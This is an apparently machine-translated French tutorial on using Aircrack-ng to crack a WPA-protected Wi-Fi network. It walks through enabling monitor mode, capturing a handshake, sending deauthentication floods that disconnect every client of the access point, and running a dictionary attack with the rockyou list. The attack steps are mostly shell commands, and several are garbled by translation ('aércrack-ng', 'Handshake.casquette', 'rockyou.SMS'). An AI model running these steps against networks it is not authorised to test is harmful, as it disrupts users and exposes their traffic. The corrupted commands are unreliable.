Airmon-ng
Airmon-NG est utilisé pour gérer les modes de carte sans fil et tuer des processus inutiles tout en utilisant Aircrack-NG. Pour renifler une connexion sans fil, vous devez changer votre carte sans fil du mode géré au mode moniteur et Airmon-NG est utilisé à cette fin.
Airodump-ng
AiroDump-NG est un renifleur sans fil qui peut capturer les données sans fil à partir d'un ou plusieurs points d'accès sans fil. Il est utilisé pour analyser les points d'accès à proximité et capturer des poignées de main.
AirEplay-ng
AirEplay-NG est utilisé pour les attaques de relecture et comme injecteur de paquet. Il peut être désauthentisé par les utilisateurs de leur APS pour capturer des poignées de main.
Airdecap-ng
AirDecap-NG est utilisé pour décrypter les paquets sans fil cryptés, WPA / WPA2 avec clé connue.
Avion-ng
Aircrack-NG est utilisé pour attaquer les protocoles sans fil WPA / WEP afin de trouver la clé.
Aircrack-NG est facile à installer dans Ubuntu en utilisant APT. Tapez simplement la commande suivante et cela installera tous les outils disponibles dans Aircrack-NG Suite.
Mise à jour Sudo apt-get
sudo apt-get install -y aércrack-ng
Usage
Dans cet article, nous allons examiner rapidement comment utiliser Aircrack-NG pour casser un réseau sans fil crypté (TR1CKST3R dans cet exemple) pour trouver le mot de passe.
Tout d'abord, énumérez toutes les cartes sans fil disponibles connectées à votre PC à l'aide de la commande `` iwconfig ''.
Nous utiliserons la carte sans fil 'WLXC83A35CB4546' 'WlxC83A35CB4546 pour ce tutoriel (cela pourrait être différent dans votre cas). Maintenant, tuez tous les processus exécutés sur la carte sans fil à l'aide d'Airmon-NG.
Ubuntu @ Ubuntu: ~ $ sudo Airmon-ng Check Kill
Démarrer le mode Monitor sur 'WLXC83A35CB4546' en tapant
ubuntu @ ubuntu: ~ $ sudo Airmon-ng start wlxc83a35cb4546
Maintenant, Airmon-NG a commencé le mode moniteur sur la carte sans fil, il apparaîtra comme un nom différent «Wlan0mon». Exécutez à nouveau 'iwconfig' pour répertorier les détails sans fil.
Ensuite, utilisez AiroDump-NG pour voir les points d'accès sans fil à proximité et leurs propriétés.
Ubuntu @ Ubuntu: ~ $ sudo Airodump-ng wlan0mon
Vous pouvez affiner la recherche à l'aide de filtres Mac (-BSSID) et canal (-c). Pour capturer la poignée de main (la poignée de main contient un mot de passe chiffré), nous devons enregistrer nos paquets quelque part en utilisant l'option «-write». Taper,
Ubuntu @ Ubuntu: ~ $ sudo Airodump-ng --Bssid 6c: B7: 49: FC: 62: E4
-C 11 Wlan0Mon - Écriture / TMP / Handshake.casquette
--BSSID: Adresse MAC de Point Access
-C: la chaîne de Point d'accès [1-13]
--Écrivez: les magasins ont capturé des paquets dans un endroit défini
Maintenant, nous devons désauthentifier chaque appareil à partir de ce point d'accès à l'aide de l'utilitaire AirEplay-ng. Écrire
Ubuntu @ Ubuntu: ~ $ sudo AirEplay-ng -0 100 -a [mac_add] wlan0mon
-R: Spécifiez les points d'accès Mac pour AirEplay-ng
-0: Spécifiez le nombre de paquets Deauth à envoyer
Après un certain temps, tous les appareils seront déconnectés de ce point d'accès, lorsqu'ils essaieront de se reconnecter, l'exécution d'AiroDump-NG capturera la poignée de main. Il apparaîtra en haut de la course Airodump-ng.
La poignée de main est stockée dans le répertoire '/ tmp /', et contient un mot de passe crypté qui peut être brut forcé hors ligne à l'aide d'un dictionnaire. Pour casser le mot de passe, nous utiliserons Aircrack-NG. Taper
ubuntu @ ubuntu: ~ $ sudo aércrack ng / tmp / handshake.CAP-01.Cap -w
/ usr / share / wordlists / rockyou.SMS
-W: spécifiez l'emplacement du dictionnaire
Aircrack-NG passera par la liste des mots de passe, et s'il est trouvé, il affichera le mot de passe utilisé comme clé.
Dans ce cas, Aircrack-NG a trouvé le mot de passe utilisé «123456789».
Maintenant, arrêtez le mode moniteur sur la carte sans fil et redémarrez le manager du réseau.
Ubuntu @ Ubuntu: ~ $ sudo Airmon-ng stop wlan0mon
ubuntu @ ubuntu: ~ $ sudo service de service-manager redémarrer
Conclusion
Aircrack-NG peut être utilisé pour auditer la sécurité sans fil ou pour casser les mots de passe oubliés. Il existe d'autres outils similaires disponibles à cet effet comme Kismet, mais Aircrack-NG est mieux connu pour un bon soutien, une polyvalence et un large éventail d'outils. Il a une interface de ligne de commande facile à utiliser qui peut facilement être automatisée à l'aide de n'importe quel langage de script comme Python.